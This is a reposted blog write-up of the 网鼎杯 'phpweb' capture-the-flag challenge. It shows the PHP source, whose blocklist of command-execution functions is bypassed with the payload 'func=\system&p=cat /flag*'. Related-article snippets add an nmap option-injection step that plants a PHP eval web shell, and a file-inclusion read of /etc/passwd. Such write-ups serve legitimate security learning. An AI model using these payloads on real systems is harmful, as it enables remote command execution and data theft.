网鼎杯-phpweb

2024-03-07 09:58
文章标签 网鼎杯 phpweb

本文主要是介绍网鼎杯-phpweb,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

找了一些php读取文件的函数尝试读取源码,试了一个readfile就成功了
在这里插入图片描述

<?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents"); function gettime($func, $p) { $result = call_user_func($func, $p); $a= gettype($result); if ($a == "string") { return $result; } else {return "";} } class Test { var $p = "Y-m-d h:i:s a"; var $func = "date"; function __destruct() { if ($this->func != "") { echo gettime($this->func, $this->p); } } } $func = $_REQUEST["func"]; $p = $_REQUEST["p"]; if ($func != null) { $func = strtolower($func); if (!in_array($func,$disable_fun)) { echo gettime($func, $p); }else { die("Hacker..."); } } ?>

在这里插入图片描述

payload:
func=\system&p=cat /flag*

这篇关于网鼎杯-phpweb的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/783127

相关文章

BUUCTF—[网鼎杯 2020 朱雀组]phpweb

题解 打开题目是这样子的。 啥也不管抓个包看看,从它返回的信息判断出func后面的是要调用的函数,p后面的是要执行的内容。 那我们直接执行个系统命令看看,可以看到返回了hack,估计是做了过滤。 func=system&p=ls 直接读取源码看看咯,可以看到过滤了好多函数,反正我认识的可以进行命令执行的函数都给禁了。 func=file_get_contents&p=ind

[网鼎杯 2020 青龙组]singal

记录下angr初使用 这道题是很简单的逻辑 32位 我们提取opcode (你可以用convert) 我是用的IDApython\ import idcadr=0x00403040step=4#距离op=[]n=10#多少个数据while(n):op.append(hex(idc.get_wide_dword(adr)))adr+=stepn-=1print(op)

网鼎杯 2020 玄武组 SSRFMe

复习一下常见的redis主从复制 主要是redis伪服务器的选择和一些小坑点 <?php function check_inner_ip($url) { $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { die('url fom

✿2018网鼎杯✿babyre

首先将Babyre.exe文件拖入peid看看有没有壳或者其他信息 很明显这是一个c# .net程序,.net程序一般要用dnspy 软件拖入dnspy,在主窗口很容易可以看到 最终flag为三段内容的拼接 this.contents = "flag{ca201ed0-9e07"; this.contents = ptr + "-11e8-b6dd"; this.content

2020网鼎杯朱雀组逆向Tree 及其思考

Tree IDA打开,先做信息收集:无壳,有符号表,函数窗口发现了未被调用过的可疑函数outtree string一下发现了疑似密文的一串字符串 找到main函数 main函数 checkflag规定输入的数据在‘0’~‘e’之间,并将其作为16进制数转换为4位二进制。 并且给出了flag的模板,可以知道flag长度为42 checkflag处理完之后将_root内存放的数据作为参

BUU [网鼎杯 2020 半决赛]AliceWebsite

BUU [网鼎杯 2020 半决赛]AliceWebsite 开题: hint附件是源码。在index.php中有一个毫无过滤的本地文件包含 <?php$action = (isset($_GET['action']) ? $_GET['action'] : 'home.php');if (file_exists($action)) {include $action;} else

2022网鼎杯re693

文件是go源码,直接在goland中打开,运行,根据输出提示来解题 根据提示 找到两个函数,第一个函数是有六个参数,并且第三个参数名为gLIhR的函数 是ZlXDJkH3OZN4Mayd 第二个函数是有三个调用并且调用名为cHZv5op8rOmlAkb6 一个一个找,找到满足只有六处引用的函数 就是UhnCm82SDGE0zLYO 然后查看主函数 func main

网鼎杯朱雀组-GO

这里猜测是魔改base64 尝试替换回去 import stringimport base64new="XYZFGHI2+/Jhi345jklmEnopuvwqrABCDKL6789abMNWcdefgstOPQRSTUVxyz01"old="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"key=

网鼎杯-nmap

Web 0x01 nmap 查看源码提示: 研究了半天分隔符绕过,后来放弃了,根据题目提示(127.0.01,不用扫外网),尝试扫描/flag并尝试将其输出到1.txt中 -iL /flag -oN 1.txt 尝试失败之后继续尝试闭合一下 127.0.0.1' -iL /flag -oN szgyy.txt ' 传马 ' <?php @eval($_POST["mazi"]);?>

[网鼎杯 2020 半决赛]AliceWebsite --不会编程的崽

网鼎杯某些题还是很简单嘛,比如这题 有交互界面先去交互看看  斯,action=about.php?有一种可能是存在任意文件读取,试一下/etc/passwd  看来猜想正确,直接读取根目录的flag